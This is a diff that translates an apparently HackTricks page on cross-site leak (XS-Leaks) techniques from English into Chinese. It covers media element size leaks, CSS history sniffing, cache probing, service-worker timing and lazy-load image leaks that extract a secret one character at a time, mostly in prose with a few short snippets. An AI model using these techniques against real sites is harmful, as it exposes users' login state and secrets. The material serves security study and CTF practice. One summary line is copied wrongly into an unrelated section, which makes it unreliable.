-- **Code Example**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/), [https://xsinator.com/testing.html#Media%20Dimensions%20Leak](https://xsinator.com/testing.html#Media%20Dimensions%20Leak), [https://xsinator.com/testing.html#Media%20Duration%20Leak](https://xsinator.com/testing.html#Media%20Duration%20Leak)
+- **包含方法**: HTML Elements
+- **可检测差异**: Page Content
+- **更多信息**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/)
+- **总结**: 读取泄露的值以区分两种可能的状态
+- **代码示例**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/), [https://xsinator.com/testing.html#Media%20Dimensions%20Leak](https://xsinator.com/testing.html#Media%20Dimensions%20Leak), [https://xsinator.com/testing.html#Media%20Duration%20Leak](https://xsinator.com/testing.html#Media%20Duration%20Leak)
 
-Information leakage through HTML elements is a concern in web security, particularly when dynamic media files are generated based on user information, or when watermarks are added, altering the media size. This can be exploited by attackers to differentiate between possible states by analyzing the information exposed by certain HTML elements.
+通过 HTML 元素的信息泄露是网络安全中的一个问题，特别是当动态媒体文件基于用户信息生成时，或者当添加水印时，改变媒体大小。这可以被攻击者利用，通过分析某些 HTML 元素暴露的信息来区分可能的状态。
 
-### Information Exposed by HTML Elements
+### 信息通过 HTML 元素暴露
 
-- **HTMLMediaElement**: This element reveals the media's `duration` and `buffered` times, which can be accessed via its API. [Read more about HTMLMediaElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
-- **HTMLVideoElement**: It exposes `videoHeight` and `videoWidth`. In some browsers, additional properties like `webkitVideoDecodedByteCount`, `webkitAudioDecodedByteCount`, and `webkitDecodedFrameCount` are available, offering more in-depth information about the media content. [Read more about HTMLVideoElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
-- **getVideoPlaybackQuality()**: This function provides details about video playback quality, including `totalVideoFrames`, which can indicate the amount of video data processed. [Read more about getVideoPlaybackQuality()](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
-- **HTMLImageElement**: This element leaks the `height` and `width` of an image. However, if an image is invalid, these properties will return 0, and the `image.decode()` function will be rejected, indicating the failure to load the image properly. [Read more about HTMLImageElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
+- **HTMLMediaElement**: 该元素揭示媒体的 `duration` 和 `buffered` 时间，可以通过其 API 访问。[了解更多关于 HTMLMediaElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
+- **HTMLVideoElement**: 它暴露 `videoHeight` 和 `videoWidth`。在某些浏览器中，额外的属性如 `webkitVideoDecodedByteCount`、`webkitAudioDecodedByteCount` 和 `webkitDecodedFrameCount` 可用，提供有关媒体内容的更深入信息。[了解更多关于 HTMLVideoElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
+- **getVideoPlaybackQuality()**: 此函数提供有关视频播放质量的详细信息，包括 `totalVideoFrames`，这可以指示处理的视频数据量。[了解更多关于 getVideoPlaybackQuality()](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
+- **HTMLImageElement**: 该元素泄露图像的 `height` 和 `width`。但是，如果图像无效，这些属性将返回 0，并且 `image.decode()` 函数将被拒绝，表示未能正确加载图像。[了解更多关于 HTMLImageElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
 
-### CSS Property
+### CSS 属性
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle](https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle), [https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html](https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html)
-- **Summary:** Identify variations in website styling that correlate with the user's state or status.
-- **Code Example**: [https://xsinator.com/testing.html#CSS%20Property%20Leak](https://xsinator.com/testing.html#CSS%20Property%20Leak)
+- **包含方法**: HTML Elements
+- **可检测差异**: Page Content
+- **更多信息**: [https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle](https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle), [https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html](https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html)
+- **总结**: 识别与用户状态或身份相关的网站样式变化。
+- **代码示例**: [https://xsinator.com/testing.html#CSS%20Property%20Leak](https://xsinator.com/testing.html#CSS%20Property%20Leak)
 
-Web applications may change w**ebsite styling depending on the status of the use**. Cross-origin CSS files can be embedded on the attacker page with the **HTML link element**, and the **rules** will be **applied** to the attacker page. If a page dynamically changes these rules, an attacker can **detect** these **differences** depending on the user state.\
-As a leak technique, the attacker can use the `window.getComputedStyle` method to **read CSS** properties of a specific HTML element. As a result, an attacker can read arbitrary CSS properties if the affected element and property name is known.
+Web 应用程序可能会根据用户的状态改变 **网站样式**。跨域 CSS 文件可以通过 **HTML link 元素** 嵌入到攻击者页面中，**规则** 将被 **应用** 到攻击者页面。如果页面动态更改这些规则，攻击者可以根据用户状态 **检测** 这些 **差异**。\
+作为一种泄露技术，攻击者可以使用 `window.getComputedStyle` 方法来 **读取特定 HTML 元素的 CSS** 属性。因此，如果已知受影响的元素和属性名称，攻击者可以读取任意 CSS 属性。
 
-### CSS History
+### CSS 历史
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history](https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history)
-- **Summary:** Detect if the `:visited` style is applied to an URL indicating it was already visited
-- **Code Example**: [http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html](http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html)
+- **包含方法**: HTML Elements
+- **可检测差异**: Page Content
+- **更多信息**: [https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history](https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history)
+- **总结**: 检测 `:visited` 样式是否应用于 URL，指示其已被访问
+- **代码示例**: [http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html](http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html)
 
 > [!NOTE]
-> According to [**this**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/), this is not working in headless Chrome.
+> 根据 [**这个**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)，在无头 Chrome 中此方法无效。
 
-The CSS `:visited` selector is utilized to style URLs differently if they have been previously visited by the user. In the past, the `getComputedStyle()` method could be employed to identify these style differences. However, modern browsers have implemented security measures to prevent this method from revealing the state of a link. These measures include always returning the computed style as if the link were visited and restricting the styles that can be applied with the `:visited` selector.
+CSS `:visited` 选择器用于对用户之前访问过的 URL 进行不同的样式处理。在过去，可以使用 `getComputedStyle()` 方法来识别这些样式差异。然而，现代浏览器已实施安全措施，以防止此方法揭示链接的状态。这些措施包括始终返回计算样式，仿佛链接已被访问，并限制可以使用 `:visited` 选择器应用的样式。
 
-Despite these restrictions, it's possible to discern the visited state of a link indirectly. One technique involves tricking the user into interacting with an area affected by CSS, specifically utilizing the `mix-blend-mode` property. This property allows the blending of elements with their background, potentially revealing the visited state based on user interaction.
+尽管有这些限制，但可以间接识别链接的访问状态。一种技术涉及诱使用户与受 CSS 影响的区域进行交互，特别是利用 `mix-blend-mode` 属性。该属性允许元素与其背景混合，可能根据用户交互揭示访问状态。
 
-Furthermore, detection can be achieved without user interaction by exploiting the rendering timings of links. Since browsers may render visited and unvisited links differently, this can introduce a measurable time difference in rendering. A proof of concept (PoC) was mentioned in a Chromium bug report, demonstrating this technique using multiple links to amplify the timing difference, thereby making the visited state detectable through timing analysis.
+此外，可以通过利用链接的渲染时间来实现无用户交互的检测。由于浏览器可能以不同方式渲染已访问和未访问的链接，这可能在渲染中引入可测量的时间差。一个概念证明（PoC）在 Chromium 错误报告中提到，演示了使用多个链接来放大时间差，从而通过时间分析使访问状态可检测。
 
-For further details on these properties and methods, visit their documentation pages:
+有关这些属性和方法的更多详细信息，请访问其文档页面：
 
-- `:visited`: [MDN Documentation](https://developer.mozilla.org/en-US/docs/Web/CSS/:visited)
-- `getComputedStyle()`: [MDN Documentation](https://developer.mozilla.org/en-US/docs/Web/API/Window/getComputedStyle)
-- `mix-blend-mode`: [MDN Documentation](https://developer.mozilla.org/en-US/docs/Web/CSS/mix-blend-mode)
+- `:visited`: [MDN 文档](https://developer.mozilla.org/en-US/docs/Web/CSS/:visited)
+- `getComputedStyle()`: [MDN 文档](https://developer.mozilla.org/en-US/docs/Web/API/Window/getComputedStyle)
+- `mix-blend-mode`: [MDN 文档](https://developer.mozilla.org/en-US/docs/Web/CSS/mix-blend-mode)
 
-### ContentDocument X-Frame Leak
+### ContentDocument X-Frame 泄露
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Headers
-- **More info**: [https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf](https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf)
-- **Summary:** In Google Chrome, a dedicated error page is displayed when a page is blocked from being embedded on a cross-origin site due to X-Frame-Options restrictions.
-- **Code Example**: [https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak](https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak)
+- **包含方法**: Frames
+- **可检测差异**: Headers
+- **更多信息**: [https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf](https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf)
+- **总结**: 在 Google Chrome 中，当由于 X-Frame-Options 限制而阻止页面嵌入到跨域站点时，会显示专用错误页面。
+- **代码示例**: [https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak](https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak)
 
-In Chrome, if a page with the `X-Frame-Options` header set to "deny" or "same-origin" is embedded as an object, an error page appears. Chrome uniquely returns an empty document object (instead of `null`) for the `contentDocument` property of this object, unlike in iframes or other browsers. Attackers could exploit this by detecting the empty document, potentially revealing information about the user's state, especially if developers inconsistently set the X-Frame-Options header, often overlooking error pages. Awareness and consistent application of security headers are crucial for preventing such leaks.
+在 Chrome 中，如果一个带有 `X-Frame-Options` 头设置为 "deny" 或 "same-origin" 的页面作为对象嵌入，则会出现错误页面。Chrome 独特地为该对象的 `contentDocument` 属性返回一个空文档对象（而不是 `null`），这与在 iframe 或其他浏览器中的表现不同。攻击者可以通过检测空文档来利用这一点，可能揭示用户状态的信息，特别是如果开发人员不一致地设置 X-Frame-Options 头，常常忽视错误页面。意识到并一致应用安全头对于防止此类泄露至关重要。
 
-### Download Detection
+### 下载检测
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: Headers
-- **More info**: [https://xsleaks.dev/docs/attacks/navigations/#download-trigger](https://xsleaks.dev/docs/attacks/navigations/#download-trigger)
-- **Summary:** An attacker can discern file downloads by leveraging iframes; continued accessibility of the iframe implies successful file download.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)
+- **包含方法**: Frames, Pop-ups
+- **可检测差异**: Headers
+- **更多信息**: [https://xsleaks.dev/docs/attacks/navigations/#download-trigger](https://xsleaks.dev/docs/attacks/navigations/#download-trigger)
+- **总结**: 攻击者可以通过利用 iframe 来识别文件下载；iframe 的持续可访问性意味着文件下载成功。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)
 
-The `Content-Disposition` header, specifically `Content-Disposition: attachment`, instructs the browser to download content rather than display it inline. This behavior can be exploited to detect whether a user has access to a page that triggers a file download. In Chromium-based browsers, there are a few techniques to detect this download behavior:
+`Content-Disposition` 头，特别是 `Content-Disposition: attachment`，指示浏览器下载内容而不是内联显示。这种行为可以被利用来检测用户是否可以访问触发文件下载的页面。在基于 Chromium 的浏览器中，有几种技术可以检测这种下载行为：
 
-1. **Download Bar Monitoring**:
-   - When a file is downloaded in Chromium-based browsers, a download bar appears at the bottom of the browser window.
-   - By monitoring changes in the window height, attackers can infer the appearance of the download bar, suggesting that a download has been initiated.
-2. **Download Navigation with Iframes**:
-   - When a page triggers a file download using the `Content-Disposition: attachment` header, it does not cause a navigation event.
-   - By loading the content in an iframe and monitoring for navigation events, it's possible to check if the content disposition causes a file download (no navigation) or not.
-3. **Download Navigation without Iframes**:
-   - Similar to the iframe technique, this method involves using `window.open` instead of an iframe.
-   - Monitoring navigation events in the newly opened window can reveal whether a file download was triggered (no navigation) or if the content is displayed inline (navigation occurs).
+1. **下载栏监控**:
+- 当文件在基于 Chromium 的浏览器中下载时，下载栏会出现在浏览器窗口底部。
+- 通过监控窗口高度的变化，攻击者可以推断下载栏的出现，表明下载已启动。
+2. **使用 iframe 的下载导航**:
+- 当页面使用 `Content-Disposition: attachment` 头触发文件下载时，它不会导致导航事件。
+- 通过在 iframe 中加载内容并监控导航事件，可以检查内容处置是否导致文件下载（无导航）或不是。
+3. **不使用 iframe 的下载导航**:
+- 类似于 iframe 技术，此方法涉及使用 `window.open` 而不是 iframe。
+- 监控新打开窗口中的导航事件可以揭示是否触发了文件下载（无导航）或内容是否内联显示（发生导航）。
 
-In scenarios where only logged-in users can trigger such downloads, these techniques can be used to indirectly infer the user's authentication state based on the browser's response to the download request.
+在只有登录用户可以触发此类下载的情况下，这些技术可以用来间接推断用户的身份验证状态，基于浏览器对下载请求的响应。
 
-### Partitioned HTTP Cache Bypass <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
+### 分区 HTTP 缓存绕过 <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
 
-- **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Timing
-- **More info**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
-- **Summary:** An attacker can discern file downloads by leveraging iframes; continued accessibility of the iframe implies successful file download.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722) (from [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
+- **包含方法**: Pop-ups
+- **可检测差异**: Timing
+- **更多信息**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
+- **总结**: 攻击者可以通过利用 iframe 来识别文件下载；iframe 的持续可访问性意味着文件下载成功。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722) (来自 [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
 
 > [!WARNING]
-> This is why this technique is interesting: Chrome now has **cache partitioning**, and the cache key of the newly opened page is: `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx)`, but if I open an ngrok page and use fetch in it, the cache key will be: `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`, the **cache key is different**, so the cache cannot be shared. You can find more detail here: [Gaining security and privacy by partitioning the cache](https://developer.chrome.com/blog/http-cache-partitioning/)\
-> (Comment from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
+> 这就是为什么这个技术很有趣：Chrome 现在有 **缓存分区**，新打开页面的缓存键是: `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx)`，但如果我打开一个 ngrok 页面并在其中使用 fetch，缓存键将是: `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`，**缓存键是不同的**，因此缓存不能共享。您可以在这里找到更多详细信息: [通过分区缓存获得安全性和隐私](https://developer.chrome.com/blog/http-cache-partitioning/)\
+> （来自 [**这里**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) 的评论）
 
-If a site `example.com` includes a resource from `*.example.com/resource` then that resource will have the **same caching key** as if the resource was directly **requested through top-level navigation**. That is because the caching key is consisted of top-level _eTLD+1_ and frame _eTLD+1_.
+如果一个站点 `example.com` 包含来自 `*.example.com/resource` 的资源，那么该资源将具有与通过顶级导航直接 **请求** 该资源相同的 **缓存键**。这是因为缓存键由顶级 _eTLD+1_ 和框架 _eTLD+1_ 组成。
 
-Because accessing the cache is faster than loading a resource, it's possible to try to change the location of a page and cancel it 20ms (for example) after. If the origin was changed after the stop, it means that the resource was cached.\
-Or could just **send some fetch to the pontentially cached page and measure the time it takes**.
+因为访问缓存比加载资源更快，所以可以尝试更改页面的位置并在 20 毫秒后取消它（例如）。如果在停止后更改了源，则意味着资源已被缓存。\
+或者可以 **发送一些 fetch 到潜在缓存页面并测量所需时间**。
 
-### Manual Redirect <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
+### 手动重定向 <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Redirects
-- **More info**: [ttps://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234)
-- **Summary:** It's possible to find out if a response to a fetch request is a redirect
-- **Code Example**:
+- **包含方法**: Fetch API
+- **可检测差异**: Redirects
+- **更多信息**: [ttps://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234)
+- **总结**: 可以找出 fetch 请求的响应是否为重定向
+- **代码示例**:
 
 ![](<../../images/image (769).png>)
 
-### Fetch with AbortController <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
+### 使用 AbortController 的 Fetch <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Timing
-- **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
-- **Summary:** It's possible to try to load a resource and about before it's loaded the loading is interrupted. Depending on if an error is triggered, the resource was or wasn't cached.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
+- **包含方法**: Fetch API
+- **可检测差异**: Timing
+- **更多信息**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
+- **总结**: 可以尝试加载资源，并在加载之前中断加载。根据是否触发错误，资源可能已被缓存或未被缓存。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
 
-Use _**fetch**_ and _**setTimeout**_ with an **AbortController** to both detect whether the **resource is cached** and to evict a specific resource from the browser cache. Moreover, the process occurs without caching new content.
+使用 _**fetch**_ 和 _**setTimeout**_ 结合 **AbortController** 来检测 **资源是否被缓存** 并将特定资源从浏览器缓存中驱逐。此外，该过程在不缓存新内容的情况下进行。
 
-### Script Pollution
+### 脚本污染
 
-- **Inclusion Methods**: HTML Elements (script)
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
-- **Summary:** It's possible to **overwrite built-in functions** and read their arguments which even from **cross-origin script** (which cannot be read directly), this might **leak valuable information**.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
+- **包含方法**: HTML Elements (script)
+- **可检测差异**: Page Content
+- **更多信息**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
+- **总结**: 可以 **覆盖内置函数** 并读取其参数，即使是来自 **跨域脚本**（无法直接读取），这可能 **泄露有价值的信息**。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
 
-### Service Workers <a href="#service-workers" id="service-workers"></a>
+### 服务工作者 <a href="#service-workers" id="service-workers"></a>
 
-- **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers)
-- **Summary:** Measure execution time of a web using service workers.
-- **Code Example**:
+- **包含方法**: Pop-ups
+- **可检测差异**: Page Content
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers)
+- **总结**: 测量使用服务工作者的网页的执行时间。
+- **代码示例**:
 
-In the given scenario, the attacker takes the initiative to register a **service worker** within one of their domains, specifically "attacker.com". Next, the attacker opens a new window in the target website from the main document and instructs the **service worker** to commence a timer. As the new window begins to load, the attacker navigates the reference obtained in the previous step to a page managed by the **service worker**.
+在给定的场景中，攻击者主动在其域之一（特别是 "attacker.com"）中注册一个 **服务工作者**。接下来，攻击者从主文档中在目标网站打开一个新窗口，并指示 **服务工作者** 开始计时。当新窗口开始加载时，攻击者将前一步获得的引用导航到由 **服务工作者** 管理的页面。
 
-Upon arrival of the request initiated in the preceding step, the **service worker** responds with a **204 (No Content)** status code, effectively terminating the navigation process. At this point, the **service worker** captures a measurement from the timer initiated earlier in step two. This measurement is influenced by the duration of JavaScript causing delays in the navigation process.
+在前一步发起的请求到达时，**服务工作者** 以 **204 (无内容)** 状态码响应，有效地终止导航过程。此时，**服务工作者** 捕获从第二步开始的计时器的测量。该测量受 JavaScript 导致的导航过程延迟的影响。
 
 > [!WARNING]
-> In an execution timing it's possible to **eliminate** **network factors** to obtain **more precise measurements**. For example, by loading the resources used by the page before loading it.
+> 在执行计时中，可以 **消除** **网络因素** 以获得 **更精确的测量**。例如，通过在加载页面之前加载页面使用的资源。
 
-### Fetch Timing
+### Fetch 时间
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
-- **Summary:** Use [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) to measure the time it takes to perform a request. Other clocks could be used.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
+- **包含方法**: Fetch API
+- **可检测差异**: Timing（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
+- **总结**: 使用 [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) 测量执行请求所需的时间。可以使用其他时钟。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
 
-### Cross-Window Timing
+### 跨窗口时间
 
-- **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
-- **Summary:** se [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) to measure the time it takes to perform a request using `window.open`. Other clocks could be used.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
+- **包含方法**: Pop-ups
+- **可检测差异**: Timing（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
+- **总结**: 使用 [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) 测量使用 `window.open` 执行请求所需的时间。可以使用其他时钟。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
 
-## With HTML or Re Injection
+## 使用 HTML 或 Re 注入
 
-Here you can find techniques to exfiltrate information from a cross-origin HTML **injecting HTML content**. These techniques are interesting in cases where for any reason you can **inject HTML but you cannot inject JS code**.
+在这里，您可以找到从跨域 HTML **注入 HTML 内容** 中提取信息的技术。这些技术在您因任何原因可以 **注入 HTML 但无法注入 JS 代码** 的情况下很有趣。
 
-### Dangling Markup
+### 悬挂标记
 
 {{#ref}}
 ../dangling-markup-html-scriptless-injection/
 {{#endref}}
 
-### Image Lazy Loading
+### 图像懒加载
 
-If you need to **exfiltrate content** and you can **add HTML previous to the secret** you should check the **common dangling markup techniques**.\
-However, if for whatever reason you **MUST** do it **char by char** (maybe the communication is via a cache hit) you can use this trick.
-
-**Images** in HTML has a "**loading**" attribute whose value can be "**lazy**". In that case, the image will be loaded when it's viewed and not while the page is loading:
+如果您需要 **提取内容** 并且可以 **在秘密之前添加 HTML**，您应该检查 **常见的悬挂标记技术**。\
+但是，如果出于某种原因您 **必须** 逐字符进行（也许通信是通过缓存命中），您可以使用这个技巧。
 
+**HTML 中的图像** 有一个 "**loading**" 属性，其值可以是 "**lazy**"。在这种情况下，图像将在被查看时加载，而不是在页面加载时：
 ```html
 <img src=/something loading=lazy >
 ```
+因此，您可以做的是**添加大量垃圾字符**（例如**成千上万个"W"**）来**填充网页在秘密之前，或者添加类似**`<br><canvas height="1850px"></canvas><br>`**的内容。**\
+然后，如果例如我们的**注入出现在标志之前**，**图像**将会**加载**，但如果出现在**标志之后**，标志 + 垃圾将**阻止其加载**（您需要尝试放置多少垃圾）。这就是在[**这篇文章**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)中发生的事情。
 
-Therefore, what you can do is to **add a lot of junk chars** (For example **thousands of "W"s**) to **fill the web page before the secret or add something like** `<br><canvas height="1850px"></canvas><br>.`\
-Then if for example our **injection appear before the flag**, the **image** would be **loaded**, but if appears **after** the **flag**, the flag + the junk will **prevent it from being loaded** (you will need to play with how much junk to place). This is what happened in [**this writeup**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/).
-
-Another option would be to use the **scroll-to-text-fragment** if allowed:
+另一个选项是使用**scroll-to-text-fragment**（如果允许的话）：
 
 #### Scroll-to-text-fragment
 
-However, you make the **bot access the page** with something like
-
+但是，您让**机器人访问页面**时使用类似
 ```
 #:~:text=SECR
 ```
+所以网页将类似于：**`https://victim.com/post.html#:~:text=SECR`**
 
-So the web page will be something like: **`https://victim.com/post.html#:~:text=SECR`**
+其中 post.html 包含攻击者的垃圾字符和懒加载图像，然后添加机器人的秘密。
 
-Where post.html contains the attacker junk chars and lazy load image and then the secret of the bot is added.
+这段文本的作用是让机器人访问页面中包含文本 `SECR` 的任何文本。由于该文本是秘密，并且它就在 **图像下方**，因此 **只有在猜测的秘密正确时，图像才会加载**。所以你就有了你的神谕来 **逐字符提取秘密**。
 
